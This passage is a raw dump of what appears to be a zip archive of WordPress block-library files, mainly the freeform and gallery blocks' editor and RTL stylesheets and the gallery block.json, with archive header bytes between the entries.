font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:37px; padding:14px; } .block-library-classic__toolbar div.mce-toolbar-grp{ border-bottom:1px solid #1e1e1e; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{ height:auto !important; width:100% !important; } .block-library-classic__toolbar .mce-container-body.mce-abs-layout{ overflow:visible; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{ position:static; } .block-library-classic__toolbar .mce-toolbar-grp>div{ padding:1px 3px; } .block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){ display:none; } .block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{ display:block; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ height:50vh !important; } @media (min-width:960px){ .block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){ height:9999rem; } .block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{ height:100%; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{ height:calc(100% - 52px); } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{ display:flex; flex-direction:column; height:100%; min-width:50vw; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{ display:flex; flex-direction:column; flex-grow:1; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ flex-grow:1; height:10px !important; } } .block-editor-freeform-modal__actions{ margin-top:16px; }PK6[D#*#*freeform/editor-rtl.cssnu[.wp-block-freeform.block-library-rich-text__tinymce{ height:auto; } .wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{ line-height:1.8; } .wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{ margin-right:0; padding-right:2.5em; } .wp-block-freeform.block-library-rich-text__tinymce blockquote{ border-right:4px solid #000; box-shadow:inset 0 0 0 0 #ddd; margin:0; padding-right:1em; } .wp-block-freeform.block-library-rich-text__tinymce pre{ color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:15px; white-space:pre-wrap; } .wp-block-freeform.block-library-rich-text__tinymce>:first-child{ margin-top:0; } .wp-block-freeform.block-library-rich-text__tinymce>:last-child{ margin-bottom:0; } .wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce a{ color:var(--wp-admin-theme-color); } .wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{ background:#e5f5fa; border-radius:2px; box-shadow:0 0 0 1px #e5f5fa; margin:0 -2px; padding:0 2px; } .wp-block-freeform.block-library-rich-text__tinymce code{ background:#f0f0f0; border-radius:2px; color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:14px; padding:2px; } .wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{ background:#ddd; } .wp-block-freeform.block-library-rich-text__tinymce .alignright{ float:right; margin:.5em 0 .5em 1em; } .wp-block-freeform.block-library-rich-text__tinymce .alignleft{ float:left; margin:.5em 1em .5em 0; } .wp-block-freeform.block-library-rich-text__tinymce .aligncenter{ display:block; margin-left:auto; margin-right:auto; } .wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{ background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC); background-position:50%; background-repeat:no-repeat; background-size:1900px 20px; cursor:default; display:block; height:20px; margin:15px auto; outline:0; width:96%; } .wp-block-freeform.block-library-rich-text__tinymce img::selection{ background-color:transparent; } .wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{ -ms-user-select:element; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{ margin:0; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{ display:block; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{ -webkit-user-drag:none; } .wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{ margin:0; padding-top:.5em; } .wp-block-freeform.block-library-rich-text__tinymce .wpview{ border:1px solid transparent; clear:both; margin-bottom:16px; position:relative; width:99.99%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{ background:transparent; display:block; max-width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{ bottom:0; left:0; position:absolute; right:0; top:0; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{ display:none; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{ border:1px dashed #ddd; padding:10px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{ word-wrap:break-word; border:1px solid #ddd; margin:0; padding:1em 0; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{ margin:0; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{ border-color:transparent; } .wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{ display:block; font-size:32px; height:32px; margin:0 auto; width:32px; } .wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{ clear:both; content:""; display:table; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{ outline:none; } .wp-block-freeform.block-library-rich-text__tinymce .gallery a{ cursor:default; } .wp-block-freeform.block-library-rich-text__tinymce .gallery{ line-height:1; margin:auto -6px; overflow-x:hidden; padding:6px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{ box-sizing:border-box; float:right; margin:0; padding:6px; text-align:center; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{ margin:0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{ font-size:13px; margin:4px 0; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{ width:100%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{ width:50%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{ width:33.3333333333%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{ width:25%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{ width:20%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{ width:16.6666666667%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{ width:14.2857142857%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{ width:12.5%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{ width:11.1111111111%; } .wp-block-freeform.block-library-rich-text__tinymce .gallery img{ border:none; height:auto; max-width:100%; padding:0; } div[data-type="core/freeform"]:before{ border:1px solid #ddd; outline:1px solid transparent; transition:border-color .1s linear,box-shadow .1s linear; } @media (prefers-reduced-motion:reduce){ div[data-type="core/freeform"]:before{ transition-delay:0s; transition-duration:0s; } } div[data-type="core/freeform"].is-selected:before{ border-color:#1e1e1e; } div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{ margin-top:0; padding-top:0; } div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{ clear:both; content:""; display:table; } .mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{ color:#1e1e1e; } .mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{ margin-left:0; margin-right:8px; } .mce-toolbar-grp .mce-btn i{ font-style:normal; } .block-library-classic__toolbar{ border:1px solid #ddd; border-bottom:none; border-radius:2px; display:none; margin:0 0 8px; padding:0; position:sticky; top:0; width:auto; z-index:31; } div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{ border-color:#1e1e1e; display:block; } .block-library-classic__toolbar .mce-tinymce{ box-shadow:none; } @media (min-width:600px){ .block-library-classic__toolbar{ padding:0; } } .block-library-classic__toolbar:empty{ background:#f5f5f5; border-bottom:1px solid #e2e4e7; display:block; } .block-library-classic__toolbar:empty:before{ color:#555d66; content:attr(data-placeholder); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:37px; padding:14px; } .block-library-classic__toolbar div.mce-toolbar-grp{ border-bottom:1px solid #1e1e1e; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{ height:auto !important; width:100% !important; } .block-library-classic__toolbar .mce-container-body.mce-abs-layout{ overflow:visible; } .block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{ position:static; } .block-library-classic__toolbar .mce-toolbar-grp>div{ padding:1px 3px; } .block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){ display:none; } .block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{ display:block; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ height:50vh !important; } @media (min-width:960px){ .block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){ height:9999rem; } .block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{ height:100%; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{ height:calc(100% - 52px); } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{ display:flex; flex-direction:column; height:100%; min-width:50vw; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{ display:flex; flex-direction:column; flex-grow:1; } .block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{ flex-grow:1; height:10px !important; } } .block-editor-freeform-modal__actions{ margin-top:16px; }PK6[螵&&freeform/editor-rtl.min.cssnu[.wp-block-freeform.block-library-rich-text__tinymce{height:auto}.wp-block-freeform.block-library-rich-text__tinymce li,.wp-block-freeform.block-library-rich-text__tinymce p{line-height:1.8}.wp-block-freeform.block-library-rich-text__tinymce ol,.wp-block-freeform.block-library-rich-text__tinymce ul{margin-right:0;padding-right:2.5em}.wp-block-freeform.block-library-rich-text__tinymce blockquote{border-right:4px solid #000;box-shadow:inset 0 0 0 0 #ddd;margin:0;padding-right:1em}.wp-block-freeform.block-library-rich-text__tinymce pre{color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;white-space:pre-wrap}.wp-block-freeform.block-library-rich-text__tinymce>:first-child{margin-top:0}.wp-block-freeform.block-library-rich-text__tinymce>:last-child{margin-bottom:0}.wp-block-freeform.block-library-rich-text__tinymce.mce-edit-focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce a{color:var(--wp-admin-theme-color)}.wp-block-freeform.block-library-rich-text__tinymce:focus a[data-mce-selected]{background:#e5f5fa;border-radius:2px;box-shadow:0 0 0 1px #e5f5fa;margin:0 -2px;padding:0 2px}.wp-block-freeform.block-library-rich-text__tinymce code{background:#f0f0f0;border-radius:2px;color:#1e1e1e;font-family:Menlo,Consolas,monaco,monospace;font-size:14px;padding:2px}.wp-block-freeform.block-library-rich-text__tinymce:focus code[data-mce-selected]{background:#ddd}.wp-block-freeform.block-library-rich-text__tinymce .alignright{float:right;margin:.5em 0 .5em 1em}.wp-block-freeform.block-library-rich-text__tinymce .alignleft{float:left;margin:.5em 1em .5em 0}.wp-block-freeform.block-library-rich-text__tinymce .aligncenter{display:block;margin-left:auto;margin-right:auto}.wp-block-freeform.block-library-rich-text__tinymce .wp-more-tag{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAADtgAAAAoBAMAAAA86gLBAAAAJFBMVEVMaXG7u7vBwcHDw8POzs68vLzGxsbMzMy+vr7AwMDQ0NDGxsYKLGzpAAAADHRSTlMA///zWf+/f///TMxNVGuqAAABwklEQVR4Ae3dMXLaQBTH4bfj8UCpx8hq0vgKvgFNemhT6Qo6gg6R+0ZahM2QLmyBJ99XWP9V5+o3jIUcLQEAAAAAAAAAAAAAAAAAAAAAAABQ8j0WL9lfTtlt18uNXAUA8O/KVtfa1tdcrOdSh9gCQAMlh1hMNbZZ1bsrsQWABsrhLRbz7z5in/32UbfUMUbkMQCAh5RfGYv82UdMdZ6HS2wjT2ILAI8r3XmM2B3WvM59vfO2xXYW2yYAENuPU8S+X/N67mKxzy225yaxBQCxLV392UdcvwV0jPVUj98ntkBWT7C7+9u2/V/vGtvXIWJ6/4rtbottWa6Ri0NUT/u72LYttrb97LHdvUXMxxrb8TO2W2TF1rYbbLG1bbGNjMi4+2Sbi1FsbbvNFlvbFtt5fDnE3d9sP1/XeIyV2Nr2U2/guZUuptNrH/dPI9eLB6SaAEBs6wPJf3/PNk9tYgsAYrv/8TFuzx/fvkFqGtrEFgDEdpcZUb7ejXy6ntrEFgDENvL6gsas4vbdyKt4DACI7TxElJv/Z7udpqFNbAFAbKduy2uU2trttM/x28UWAAAAAAAAAAAAAAAAAAAAAAAAAADgDyPwGmGTCZp7AAAAAElFTkSuQmCC);background-position:50%;background-repeat:no-repeat;background-size:1900px 20px;cursor:default;display:block;height:20px;margin:15px auto;outline:0;width:96%}.wp-block-freeform.block-library-rich-text__tinymce img::selection{background-color:transparent}.wp-block-freeform.block-library-rich-text__tinymce div.mceTemp{-ms-user-select:element}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption{margin:0;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption a,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption img{display:block}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption,.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption *{-webkit-user-drag:none}.wp-block-freeform.block-library-rich-text__tinymce dl.wp-caption .wp-caption-dd{margin:0;padding-top:.5em}.wp-block-freeform.block-library-rich-text__tinymce .wpview{border:1px solid transparent;clear:both;margin-bottom:16px;position:relative;width:99.99%}.wp-block-freeform.block-library-rich-text__tinymce .wpview iframe{background:transparent;display:block;max-width:100%}.wp-block-freeform.block-library-rich-text__tinymce .wpview .mce-shim{bottom:0;left:0;position:absolute;right:0;top:0}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected="2"] .mce-shim{display:none}.wp-block-freeform.block-library-rich-text__tinymce .wpview .loading-placeholder{border:1px dashed #ddd;padding:10px}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error{word-wrap:break-word;border:1px solid #ddd;margin:0;padding:1em 0}.wp-block-freeform.block-library-rich-text__tinymce .wpview .wpview-error p{margin:0;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .loading-placeholder,.wp-block-freeform.block-library-rich-text__tinymce .wpview[data-mce-selected] .wpview-error{border-color:transparent}.wp-block-freeform.block-library-rich-text__tinymce .wpview .dashicons{display:block;font-size:32px;height:32px;margin:0 auto;width:32px}.wp-block-freeform.block-library-rich-text__tinymce .wpview.wpview-type-gallery:after{clear:both;content:"";display:table}.wp-block-freeform.block-library-rich-text__tinymce .gallery img[data-mce-selected]:focus{outline:none}.wp-block-freeform.block-library-rich-text__tinymce .gallery a{cursor:default}.wp-block-freeform.block-library-rich-text__tinymce .gallery{line-height:1;margin:auto -6px;overflow-x:hidden;padding:6px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-item{box-sizing:border-box;float:right;margin:0;padding:6px;text-align:center}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption,.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-icon{margin:0}.wp-block-freeform.block-library-rich-text__tinymce .gallery .gallery-caption{font-size:13px;margin:4px 0}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-1 .gallery-item{width:100%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-2 .gallery-item{width:50%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-3 .gallery-item{width:33.3333333333%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-4 .gallery-item{width:25%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-5 .gallery-item{width:20%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-6 .gallery-item{width:16.6666666667%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-7 .gallery-item{width:14.2857142857%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-8 .gallery-item{width:12.5%}.wp-block-freeform.block-library-rich-text__tinymce .gallery-columns-9 .gallery-item{width:11.1111111111%}.wp-block-freeform.block-library-rich-text__tinymce .gallery img{border:none;height:auto;max-width:100%;padding:0}div[data-type="core/freeform"]:before{border:1px solid #ddd;outline:1px solid transparent;transition:border-color .1s linear,box-shadow .1s linear}@media (prefers-reduced-motion:reduce){div[data-type="core/freeform"]:before{transition-delay:0s;transition-duration:0s}}div[data-type="core/freeform"].is-selected:before{border-color:#1e1e1e}div[data-type="core/freeform"] .block-editor-block-contextual-toolbar+div{margin-top:0;padding-top:0}div[data-type="core/freeform"].is-selected .block-library-rich-text__tinymce:after{clear:both;content:"";display:table}.mce-toolbar-grp .mce-btn.mce-active button,.mce-toolbar-grp .mce-btn.mce-active i,.mce-toolbar-grp .mce-btn.mce-active:hover button,.mce-toolbar-grp .mce-btn.mce-active:hover i{color:#1e1e1e}.mce-toolbar-grp .mce-rtl .mce-flow-layout-item.mce-last{margin-left:0;margin-right:8px}.mce-toolbar-grp .mce-btn i{font-style:normal}.block-library-classic__toolbar{border:1px solid #ddd;border-bottom:none;border-radius:2px;display:none;margin:0 0 8px;padding:0;position:sticky;top:0;width:auto;z-index:31}div[data-type="core/freeform"].is-selected .block-library-classic__toolbar{border-color:#1e1e1e;display:block}.block-library-classic__toolbar .mce-tinymce{box-shadow:none}@media (min-width:600px){.block-library-classic__toolbar{padding:0}}.block-library-classic__toolbar:empty{background:#f5f5f5;border-bottom:1px solid #e2e4e7;display:block}.block-library-classic__toolbar:empty:before{color:#555d66;content:attr(data-placeholder);font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:37px;padding:14px}.block-library-classic__toolbar div.mce-toolbar-grp{border-bottom:1px solid #1e1e1e}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar .mce-menubar>div,.block-library-classic__toolbar .mce-tinymce-inline,.block-library-classic__toolbar .mce-tinymce-inline>div,.block-library-classic__toolbar div.mce-toolbar-grp,.block-library-classic__toolbar div.mce-toolbar-grp>div{height:auto!important;width:100%!important}.block-library-classic__toolbar .mce-container-body.mce-abs-layout{overflow:visible}.block-library-classic__toolbar .mce-menubar,.block-library-classic__toolbar div.mce-toolbar-grp{position:static}.block-library-classic__toolbar .mce-toolbar-grp>div{padding:1px 3px}.block-library-classic__toolbar .mce-toolbar-grp .mce-toolbar:not(:first-child){display:none}.block-library-classic__toolbar.has-advanced-toolbar .mce-toolbar-grp .mce-toolbar{display:block}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{height:50vh!important}@media (min-width:960px){.block-editor-freeform-modal .block-editor-freeform-modal__content:not(.is-full-screen){height:9999rem}.block-editor-freeform-modal .block-editor-freeform-modal__content .components-modal__header+div{height:100%}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-tinymce{height:calc(100% - 52px)}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-container-body{display:flex;flex-direction:column;height:100%;min-width:50vw}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area{display:flex;flex-direction:column;flex-grow:1}.block-editor-freeform-modal .block-editor-freeform-modal__content .mce-edit-area iframe{flex-grow:1;height:10px!important}}.block-editor-freeform-modal__actions{margin-top:16px}PK6[}  gallery/block.jsonnu[{ "apiVersion": 2, "name": "core/gallery", "category": "media", "attributes": { "images": { "type": "array", "default": [], "source": "query", "selector": ".blocks-gallery-item", "query": { "url": { "type": "string", "source": "attribute", "selector": "img", "attribute": "src" }, "fullUrl": { "type": "string", "source": "attribute", "selector": "img", "attribute": "data-full-url" }, "link": { "type": "string", "source": "attribute", "selector": "img", "attribute": "data-link" }, "alt": { "type": "string", "source": "attribute", "selector": "img", "attribute": "alt", "default": "" }, "id": { "type": "string", "source": "attribute", "selector": "img", "attribute": "data-id" }, "caption": { "type": "string", "source": "html", "selector": ".blocks-gallery-item__caption" } } }, "ids": { "type": "array", "items": { "type": "number" }, "default": [] }, "columns": { "type": "number", "minimum": 1, "maximum": 8 }, "caption": { "type": "string", "source": "html", "selector": ".blocks-gallery-caption" }, "imageCrop": { "type": "boolean", "default": true }, "linkTo": { "type": "string" }, "sizeSlug": { "type": "string", "default": "large" } }, "supports": { "anchor": true, "align": true }, "editorStyle": "wp-block-gallery-editor", "style": "wp-block-gallery" } PK6[ʼ gallery/editor.min.cssnu[figure.wp-block-gallery{display:block}figure.wp-block-gallery>.blocks-gallery-caption{flex:0 0 100%}figure.wp-block-gallery>.blocks-gallery-media-placeholder-wrapper{flex-basis:100%}figure.wp-block-gallery .wp-block-image .components-notice.is-error{display:block}figure.wp-block-gallery .wp-block-image .components-notice__content{margin:4px 0}figure.wp-block-gallery .wp-block-image .components-notice__dismiss{position:absolute;right:5px;top:0}figure.wp-block-gallery .block-editor-media-placeholder.is-appender .components-placeholder__label{display:none}figure.wp-block-gallery .block-editor-media-placeholder.is-appender .block-editor-media-placeholder__button{margin-bottom:0}figure.wp-block-gallery .block-editor-media-placeholder{margin:0}figure.wp-block-gallery .block-editor-media-placeholder .components-placeholder__label{display:flex}figure.wp-block-gallery .block-editor-media-placeholder figcaption{z-index:2}figure.wp-block-gallery .components-spinner{left:50%;margin-left:-9px;margin-top:-9px;position:absolute;top:50%}.gallery-settings-buttons .components-button:first-child{margin-right:8px}.gallery-image-sizes .components-base-control__label{display:block;margin-bottom:4px}.gallery-image-sizes .gallery-image-sizes__loading{align-items:center;color:#757575;display:flex;font-size:12px}.gallery-image-sizes .components-spinner{margin:0 8px 0 4px}.blocks-gallery-item figure:not(.is-selected):focus,.blocks-gallery-item img:focus{outline:none}.blocks-gallery-item figure.is-selected:before{bottom:0;box-shadow:0 0 0 1px #fff inset,0 0 0 3px var(--wp-admin-theme-color) inset;content:"";left:0;outline:2px solid transparent;pointer-events:none;position:absolute;right:0;top:0;z-index:1}.blocks-gallery-item figure.is-transient img{opacity:.3}.blocks-gallery-item .is-selected .block-library-gallery-item__inline-menu{display:inline-flex}.blocks-gallery-item .block-editor-media-placeholder{height:100%;margin:0}.blocks-gallery-item .block-editor-media-placeholder .components-placeholder__label{display:flex}.block-library-gallery-item__inline-menu{background:#fff;border:1px solid #1e1e1e;border-radius:2px;display:none;margin:8px;position:absolute;top:-2px;transition:box-shadow .2s ease-out;z-index:20}@media (prefers-reduced-motion:reduce){.block-library-gallery-item__inline-menu{transition-delay:0s;transition-duration:0s}}.block-library-gallery-item__inline-menu:hover{box-shadow:0 .7px 1px rgba(0,0,0,.1),0 1.2px 1.7px -.2px rgba(0,0,0,.1),0 2.3px 3.3px -.5px rgba(0,0,0,.1)}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu,.columns-8 .block-library-gallery-item__inline-menu{padding:2px}}.block-library-gallery-item__inline-menu .components-button.has-icon:not(:focus){border:none;box-shadow:none}@media (min-width:600px){.columns-7 .block-library-gallery-item__inline-menu .components-button.has-icon,.columns-8 .block-library-gallery-item__inline-menu .components-button.has-icon{height:inherit;padding:0;width:inherit}}.block-library-gallery-item__inline-menu.is-left{left:-2px}.block-library-gallery-item__inline-menu.is-right{right:-2px}.wp-block-gallery ul.blocks-gallery-grid{margin:0;padding:0}@media (min-width:600px){.wp-block-update-gallery-modal{max-width:480px}}.wp-block-update-gallery-modal-buttons{display:flex;gap:12px;justify-content:flex-end}PK6[r77gallery/style-rtl.min.cssnu[.blocks-gallery-grid:not(.has-nested-images),.wp-block-gallery:not(.has-nested-images){display:flex;flex-wrap:wrap;list-style-type:none;margin:0;padding:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item{display:flex;flex-direction:column;flex-grow:1;justify-content:center;margin:0 0 1em 1em;position:relative;width:calc(50% - 1em)}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image:nth-of-type(2n),.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item:nth-of-type(2n){margin-left:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figure,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figure,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figure{align-items:flex-end;display:flex;height:100%;justify-content:flex-start;margin:0}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item img{display:block;height:auto;max-width:100%;width:auto}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption{background:linear-gradient(0deg,rgba(0,0,0,.7),rgba(0,0,0,.3) 70%,transparent);bottom:0;box-sizing:border-box;color:#fff;font-size:.8em;margin:0;max-height:100%;overflow:auto;padding:3em .77em .7em;position:absolute;text-align:center;width:100%;z-index:2}.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-image figcaption img,.blocks-gallery-grid:not(.has-nested-images) .blocks-gallery-item figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-image figcaption img,.wp-block-gallery:not(.has-nested-images) .blocks-gallery-item figcaption img{display:inline}.blocks-gallery-grid:not(.has-nested-images) figcaption,.wp-block-gallery:not(.has-nested-images) figcaption{flex-grow:1}.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-image img,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item a,.blocks-gallery-grid:not(.has-nested-images).is-cropped .blocks-gallery-item img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-image img,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item a,.wp-block-gallery:not(.has-nested-images).is-cropped .blocks-gallery-item img{flex:1;height:100%;object-fit:cover;width:100%}.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-1 .blocks-gallery-item,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-image,.wp-block-gallery:not(.has-nested-images).columns-1 .blocks-gallery-item{margin-left:0;width:100%}@media (min-width:600px){.blocks-gallery-grid:not(.has-nested-images).columns-3 .blocks-gallery-image,.blocks-gallery-grid:not(.has-nested-images).columns-3 